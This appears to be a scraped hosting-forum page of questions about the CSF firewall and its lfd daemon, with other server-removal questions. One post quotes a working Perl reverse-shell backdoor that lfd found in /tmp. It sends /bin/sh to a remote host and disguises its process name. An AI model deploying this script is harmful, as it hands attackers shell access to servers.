Remove Lfd
I just need CSF on my server. I don't need lfd, and I need to remove lfd from my server.
Related Forum Messages:
Remove Empty Folders And Remove From A Db
I've got a site which auto-creates subdomains, installs a script automatically and inserts details into a MySQL db. I have had some issues recently, so I have loads (talking 100s) of folders that are empty which I need to remove, and I need to remove the details of said folders from the db also. Any ideas how I can do this? I'm using the Plesk control panel, so removing the subdomain via the Plesk CLI may be the best way in that respect, but the db is external to Plesk so that would not be edited.
Lfd Failed
I have received many mails, 40 or more per day, saying: lfd failed @ Fri May 1 13:36:14 2009. A restart was attempted automagically. Service Check Method: [check command]
Receive Email From LFD
I didn't do any updates, but received this email from lfd. Could it be because of an automatic cPanel update? If yes, how do I check the last update date/information?
---------------------
Time: Wed Nov 4 01:00:04 2009 +0330
The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated:
/usr/sbin/lvchange: FAILED
/usr/sbin/lvconvert: FAILED
/usr/sbin/lvcreate: FAILED
/usr/sbin/lvdisplay: FAILED
/usr/sbin/lvextend: FAILED
/usr/sbin/lvm: FAILED
/usr/sbin/lvmchange: FAILED
/usr/sbin/lvmdiskscan: FAILED
/usr/sbin/lvmsadc: FAILED
/usr/sbin/lvmsar: FAILED
/usr/sbin/lvreduce: FAILED
/usr/sbin/lvremove: FAILED
/usr/sbin/lvrename: FAILED
/usr/sbin/lvresize: FAILED
/usr/sbin/lvs: FAILED
/usr/sbin/lvscan: FAILED
/usr/sbin/pvchange: FAILED
/usr/sbin/pvck: FAILED
/usr/sbin/pvcreate: FAILED
/usr/sbin/pvdisplay: FAILED
/usr/sbin/pvmove: FAILED
/usr/sbin/pvremove: FAILED
/usr/sbin/pvresize: FAILED
/usr/sbin/pvs: FAILED
/usr/sbin/pvscan: FAILED
/usr/sbin/vgcfgbackup: FAILED
/usr/sbin/vgcfgrestore: FAILED
/usr/sbin/vgchange: FAILED
/usr/sbin/vgck: FAILED
/usr/sbin/vgconvert: FAILED
/usr/sbin/vgcreate: FAILED
/usr/sbin/vgdisplay: FAILED
/usr/sbin/vgexport: FAILED
/usr/sbin/vgextend: FAILED
/usr/sbin/vgimport: FAILED
/usr/sbin/vgmerge: FAILED
/usr/sbin/vgmknodes: FAILED
/usr/sbin/vgreduce: FAILED
/usr/sbin/vgremove: FAILED
/usr/sbin/vgrename: FAILED
/usr/sbin/vgs: FAILED
/usr/sbin/vgscan: FAILED
/usr/sbin/vgsplit: FAILED
/sbin/ip6tables: FAILED
/sbin/ip6tables-restore: FAILED
/sbin/ip6tables-save: FAILED
/sbin/iptables: FAILED
/sbin/iptables-restore: FAILED
/sbin/iptables-save: FAILED
/sbin/lvm: FAILED
/sbin/lvm.static: FAILED
/sbin/pvscan: FAILED
/sbin/vgchange: FAILED
/sbin/vgscan: FAILED
Csf / Lfd Setup
My environment: cpanel / whm, shared and reseller accounts (300+ domains), secure only ports for cpanel/whm/webmail
Problem: Seems like too often people get blocked out of firewall for ftp, webmail, pop3 or webmail. I'm not sure what to do without sacrificing good security measures.
Below is my configuration for CSF (chirpy's firewall)
Code:
###############################################################################
# Copyright 2006, Way to the Web Limited
# URL: http://www.waytotheweb.com
# Email: sales@waytotheweb.com
###############################################################################
# Testing flag - enables a CRON job that clears iptables incase of
# configuration problems when you start csf. This should be enabled until you
# are sure that the firewall works - i.e. incase you get locked out of your
# server! Then do remember to set it to 0 and restart csf when you're sure
# everything is OK. Stopping csf will remove the line from /etc/crontab
TESTING = "0"

# The interval for the crontab in minutes. Since this uses the system clock the
# CRON job will run at the interval past the hour and not from when you issue
# the start command. Therefore an interval of 5 minutes means the firewall
# will be cleared in 0-5 minutes from the firewall start
TESTING_INTERVAL = "5"

# Enabling auto updates creates a cron job called /etc/cron.d/csf_update which
# runs once per day to see if there is an update to csf+lfd and upgrades if
# available and restarts csf and lfd. Updates do not overwrite configuration
# files or email templates. An email will be sent to the root account if an
# update is performed
AUTO_UPDATES = "0"

# Ethernet device setting is taken from the shared IP address in
# /etc/wwwacct.conf but can be overridden here (e.g. "eth0")
#
# If you have multiple ethernet NICs that you want to apply all rules to, then
# you can set the following to the interface name immediately followed by a
# plus sign. For example, eth+ will apply all rules to eth0, eth1, etc
ETH_DEVICE = ""

# Unfiltered ethernet devices in a comma separated list (e.g "eth1,eth2")
ETH_DEVICE_SKIP = ""

# Lists of ports in the following comma separated lists can be added using a
# colon (e.g. 30000:35000).

# Allow incoming TCP ports
TCP_IN = "20,21,22,25,53,80,110,143,443,465,953,993,995,2083,2087,2095,2096,22305"

# Allow outgoing TCP ports
TCP_OUT = "20,21,22,25,37,43,53,80,110,113,443,587,873,953,2087,2089,2703"

# Allow incoming UDP ports
UDP_IN = "20,21,53,953"

# Allow outgoing UDP ports
# To allow outgoing traceroute add 33434:33523 to this list
UDP_OUT = "20,21,53,113,123,873,953,6277"

# Allow incoming PING
ICMP_IN = "1"

# Allow outgoing PING
ICMP_OUT = "1"

# Block outgoing SMTP except for root, exim and mailman (forces scripts/users
# to use the exim/sendmail binary instead of sockets access). This replaces the
# protection as WHM > Tweak Settings > SMTP Tweaks. This will block hosting
# clients from using your server as an SMTP relay
SMTP_BLOCK = "0"

# If SMTP_BLOCK is enabled but you want to allow local connections to port 25
# on the server (e.g. for web scripts) then enable this option too
SMTP_ALLOWLOCAL = "0"

# If this is a MONOLITHIC kernel (i.e. it has no LKM support, e.g. a VPS) then
# set this to 1. Because of the nature of monolithic kernels, it's not easy to
# determine which modules have been built-in, so some functionality may not be
# available and this firewall script may not work.
#
# One example is if the ip_conntrack and ip_conntrack_ftp iptables kernel
# modules are not available. If this happens, FTP passive mode (PASV) won't
# work. In such circumstances you will have to open a hole in your firewall and
# configure the FTP daemon to use that same hole. For example, with pure-ftpd
# you could add the port range 30000:35000 to TCP_IN and add the following line
# to /etc/pure-ftpd.conf (without the leading #):
# PassivePortRange 30000 35000
# Then restart pure-ftpd and csf and passive FTP should then work
MONOLITHIC_KERNEL = "0"

# Enable logging of dropped connections to blocked ports to syslog, usually
# /var/log/messages
DROP_LOGGING = "1"

# Enable logging of dropped connections to blocked IP addresses in csf.deny or
# by lfd with temporary connection tracking blocks
DROP_IP_LOGGING = "0"

# Only log reserved port dropped connections (0:1023). Useful since you're not
# usually bothered about ephemeral port drops
DROP_ONLYRES = "0"

# Commonly blocked ports that you do not want logging as they tend to just fill
# up the log file. These ports are specifically blocked (applied to TCP and UDP
# protocols) for incoming connections
DROP_NOLOG = "67,68,111,113,135:139,445,513,520,1026,1027,1234,1433,1434,1524,3127"

# Enable packet filtering for unwanted or illegal packets
PACKET_FILTER = "1"

# Log packets dropped by the packet filtering option PACKET_FILTER. This will
# show packet drops that iptables has deemed INVALID (i.e. there is no
# established TCP connection in the state table), or if the TCP flags in the
# packet are out of sequence in the protocol exchange.
#
# If you see packets being dropped that you would rather allow then disable the
# PACKET_FILTER option above by setting it to "0"
DROP_PF_LOGGING = "0"

# Enable verbose output of iptables commands
VERBOSE = "1"

# If you wish to allow access from dynamic DNS records (for example if your IP
# address changes whenever you connect to the internet but you have a dedicated
# dynamic DNS record from the likes of dyndns.org) then you can list the FQDN
# records in csf.dyndns and then set the following to the number of seconds to
# poll for a change in the IP address. If the IP address has changed iptables
# will be updated.
#
# A setting of 600 would check for IP updates every 10 minutes. Set the value
# to 0 to disable the feature
DYNDNS = "0"

# If you wish to allow access from all IP's that have authenticated using POP
# before SMTP (i.e. are valid clients) then you can whitelist them using this
# option which checks for IP addresses in /etc/relayhosts which last for 30
# minutes in that file after a successful POP authentication
#
# A setting of 60 would update IP's every 1 minute. Set the value
# to 0 to disable the feature
RELAYHOSTS = "0"

# Enable this option if you want to allow incoming connections from reserved
# ports. Normally, only DNS connections have the same SRC and DST port (53)
# and any other connections should have a SRC port > 1023. On *nix systems this
# rule is generally adhered to and reserved ports are not allocated as SRC
# ports. However, other notable OS's appear to ignore this and allocate them at
# will. This means it's possible that users may come in on reserved ports, so
# enable this option if you want to allow them to, or disable it if you want to
# be strict
ALLOW_RES_PORTS = "1"

# Limit the number of IP's kept in the /etc/csf/csf.deny file. This can be
# important as a large number of IP addresses create a large number of iptables
# rules (4 times the number of IP's) which can cause problems on some systems
# where either the the number of iptables entries has been limited (esp VPS's)
# or where resources are limited. This can result in slow network performance,
# or, in the case of iptables entry limits, can prevent your server from
# booting as not all the required iptables chain settings will be correctly
# configured. The value set here is the maximum number of IPs/CIDRs allowed
# if the limit is reached, the entries will be rotated so that the oldest
# entries (i.e. the ones at the top) will be removed and the latest is added.
# The limit is only checked when using csf -d (which is what lfd also uses)
# Set to 0 to disable limiting
DENY_IP_LIMIT = "100"
LFD Messages Regarding High Load...
I have a VPS with Future Hosting and recently I have been getting more and more notifications from LFD regarding high CPU load. For example:
Time: Sun Jun 14 06:50:48 2009 -0500
1 Min Load Avg: 9.47
5 Min Load Avg: 6.25
15 Min Load Avg: 3.68
Running/Total Processes: 2/105
I am getting at least one of these a day now and I am also getting alerts about services failing, SPAMD in particular but also EXIM (and messages about LFD being unable to determine the exim queue length). External monitors are also warning me about SMTP timeouts during the same time period that I get the "high load" errors. Tech support seems a bit stumped by this one and ALWAYS comes back with "load looks fine right now". With the frequency of the warning emails increasing I am getting very concerned about the stability of my VPS. I am not running anything significant on my VPS yet, with minimal visitors and load (RAM usage consistently stays below 300MB on a VPS with 1+GB RAM).
Lfd - Blocked With Too Many Connections - Time_wait
Our customer has been banned and we have received a notification (we use csf). The email received:
----------------------------------------------------
Time: Sun May 18 08:52:53 2008
IP: 81.22.77.88 (**)
Connections: 491
Blocked: permanently
Connections:
tcp 0 0 72.39.255.200:20 81.22.77.88:5201 TIME_WAIT
tcp 0 0 72.39.255.200:20 81.22.77.88:5457 TIME_WAIT
tcp 0 0 72.39.255.200:20 81.22.77.88:5456 TIME_WAIT
tcp 0 0 72.39.255.200:20 81.22.77.88:5200 TIME_WAIT
tcp 0 0 72.39.255.200:20 81.22.77.88:5203 TIME_WAIT
tcp 0 0 72.39.255.200:20 81.22.77.88:5459 TIME_WAIT
.....
.....
----------------------------------------------------
The IP is the same for all 491 connections, but the port changes. What exactly does this mean?
Trying To Install CSF/LFD On VPS
I was trying to install CSF/LFD on to my VPS but I'm having problems. It's coming out with the error:
iptables v1.3.5: Unknown arg `-j'
Try `iptables -h' or 'iptables --help' for more information.
Error: iptables command [/sbin/iptables -A LOGDROPIN -j ] failed, at line 213
Rus over at CheapVPS assures me his servers support CFD/APF fully so it's not something on his end and I've thought of everything on my end. Has anyone come across this problem before?
Lfd: Suspicious File Alert
I got this system email:
Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken
So I looked and the file says this:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $! ");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $! ");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! ");
connect(SOCKET, $paddr) || die("Error: $! ");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
Daily Dozen LFD Blocks Normal
I recently got a dedi from Hivelocity, and they installed CSF/LFD. On my previous hosts, I didn't have this, just cPHulk. With this dedi, I'm receiving nearly a dozen daily emails from LFD with IPs that have been blocked for multiple failed logins, mostly with username root, but also sales, staff, admin, system, etc., and a few for port scanning. Is this normal? I've already disabled direct root login via SSH, and I'm not really worried about anyone actually managing to gain access, I'm just curious about the high number of attempts. On previous hosts, where I actually had active sites and forums, with links posted on other forums that are indexed and nicely ranked by Google, I rarely received any emails from cPBrute at all.
Lfd Warning: Hack Attempt Or Legit
Code:
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser ] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October. The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
File content:
Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__
Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
Lfd Not Sending SSH Login Anymore
I've noticed that LFD (from CSF) is not sending SSH login notifications anymore... I've tried "mail root" and "mail <my email>", and it's working. I see the login line in /var/log/secure. I tried to tail exim_maillog and I did not see it at all! I've tried to restart CSF and also looked at the configuration; SSH is still there... I'm running CentOS 4.x with cPanel. Got any clue? I've got another server, same configuration, and it's still sending the notification.
Lfd: High 5 Minute Load Average Alert - 6.37
I use CSF on a VPS with 512 RAM and 1024 Burst and the other day I received the below notification. My host said it was Mailman and since I don't use mailing lists the recommendation was to disable it. So I did. I'm curious tho as to why this happened in the first place.
Time: Wed Mar 19 17:53:33 2008
1 Min Load Avg: 11.41
5 Min Load Avg: 6.37
15 Min Load Avg: 2.70
Running/Total Processes: 12/94
...............
Lfd: System Exploit Checking Detected A Possible Compromise
I always receive this email from lfd:
Time: Tue Apr 29 03:40:13 2008
Possible detection of "Random JS Toolkit"
Failed to create test directory /etc/csf/1: No space left on device: See [url] for more information
I do this to test if my server is infected:
mkdir /home/1
It was created without any problems, and I used tcpdump and I got this:
<script type="text/javascript" src='jscripts/ips_ipsclass.js'></script>
<script type="text/javascript" src='jscripts/ipb_global.js'></script>
<script type="text/javascript" src='cache/lang_cache/en/lang_javascript.js'></script>
<script type="text/javascript" src='jscripts/ips_xmlhttprequest.js'></script>
<script type="text/javascript" src='jscripts/ipb_global_xmlenhanced.js'></script>
Does that mean the server is infected? But these scripts are for the IPB forum board, so why do I still receive this email?
Remove Xen Xps
I set up a Xen VPS some time back. I need to remove it permanently. I have used the commands virsh destroy <domainID> as well as xm destroy <domainID>. However, they only perform a shutdown. I can restore it back! I want to remove / wipe it permanently so that the memory consumed is given up and reflected in the core server.
Remove History Command
Is there any way that I can remove a specific command from history?
628 ll
629 cat bash.sh
630 man mail
631 exit
632 history
You see, my history command displays output like this. I need to remove the 630th command. Is this possible? I can use history -r, but it will remove all the commands executed in the session. I need a command to remove a specific thing from history.
Yum Remove Command
I had some issues with PHP compilation; it seems to be an issue with zlib. So I decided to remove it. What happened then is something like a nightmare... The command yum remove zlib removed zlib + all dependencies without asking me what to remove. So it removed the majority of packages, including yum itself. How can I force yum to not remove dependencies when I uninstall some package?
Remove CPanel Garbage....
I hate cpanel. It's bloated, slow, and just twice as hard to do anything (over command line). Anyways, how can I turn this crap off... it seems like every time I reboot something comes back and changes conf files (installs older versions of programs) and stuff like that. I've shut off any cpanel stuff I can find in the services startup and removed all crons, but is there anything else? I get emails like cpsrvd failed @ Fri Jun 22 10:25:38 2007. A restart was attempted automagicly.
Is Logwatch Important? Can I Remove It
I'm running out of disk space on /var and it seems /var/cache/logwatch has almost 4GB of space. Can I remove everything inside and uninstall logwatch? How do I remove logwatch from the system, and is there any effect on system functionality? DirectAdmin CentOS4.4
How To Use .htaccess To Remove Subdirectory...
Is it possible to use .htaccess to remove the subdirectory from a url? The reason I ask is that the script I want to use requires members to be in a /users/ directory, and I would like to remove that part of the url. For instance... can I use .htaccess to change www.thewebsite.com/users/username to www.thewebsite.com/username? I have absolutely no need to access the /users/ directory without the username, it's just that all accounts are created in that directory. Is it possible?
Flushing Iptables/remove Rules
I have a VPS (Virtuozzo) with cPanel installed. I noticed that iptables running in the VPS had many DROP rules when I listed them using the iptables -nL command. So I flushed iptables using the "iptables -F" command and also the "> /etc/sysconfig/iptables" command and restarted iptables. When I try to list the rules it shows empty. However, when I try to list them after a few minutes it is showing the same old rules with many DROP rules yet again! Is there any way to remove the rules completely?
How Do I Remove My ISP IP From Email And Only Use My Server IP
The way Exim is set up on Cpanel/Centos is that it adds the origination IP and the server IP address that the email is relayed through. Because many RBL's flag Verizon and Comcast ISP IP's as spam sources, it causes my email relayed through my server to be rejected. Note: My server IP is not on any RBL for spam or abuse. Is there a way to edit Exim to only use the server IP address that I relay through?
Remove Server MySQL Connection
I bought a VPS to run a part of an application I have and it needs to connect to my database in cpanel. I have set everything up properly and allowed the remote server to connect to my server, and I updated the DB connect file with the correct mysql server username and password. But when I try to run the script I get this error.
Quote:
Client does not support authentication protocol requested by server; consider upgrading MySQL client in
I'm not 100% sure what to do. I don't understand why it wouldn't work because it works perfectly on the main server with my scripts. But I get that error message on the remote server.
Remove Linux And Install Windows XP
I need to remove CentOS from an old office PC. Don't get me wrong, I use Linux on almost everything, but for a specific reason I need to get XP back onto this old AMD PC. I cannot install XP. I cannot remove Linux. This install is the devil. It will not let me remove it. I tried everything. The XP disk goes to a black screen and stays there; this happens with some hardware and you have to remove all Linux partitions to make the Windows XP disk install start. The problem: I CAN'T remove it. I go to rescue mode, or interactive mode, it doesn't matter, I cannot remove Linux. "fdisk -l" Go to my partition fdisk /dev/sda2 d for delete and it just outputs: No partition is defined yet! I tried lots of ways around it and always get that message. Linux doesn't let me remove the partitions. How in the world do I get XP back now?
Batch Remove Files And Copy
to move the httpdocs folders of multiple sites on my Plesk server to another server (the share on the other server is already mounted so that's not an issue), but there are 31 different domains I need to copy. Wondering if anyone knows any way to batch automate a cp process to copy each domain's files to a new folder on the remote server (this is for backup purposes, not live sites, so I can't use Plesk migration etc.)
Can't Remove The Ip Blocked By APF Antidos
APF Antidos blacklisted a number of IPs that seem to be okay to me. I have tried to delete them with /etc/apf/apf -l , /etc/apf/apf --unban xxx.xx.., and even iptables --flush, to no avail! Where does apf store its IP rules? I guess that is /etc/apf/.ipt.chains but it was not found .. looks like there was no command line option allowing me to remove IPs from the apf blacklist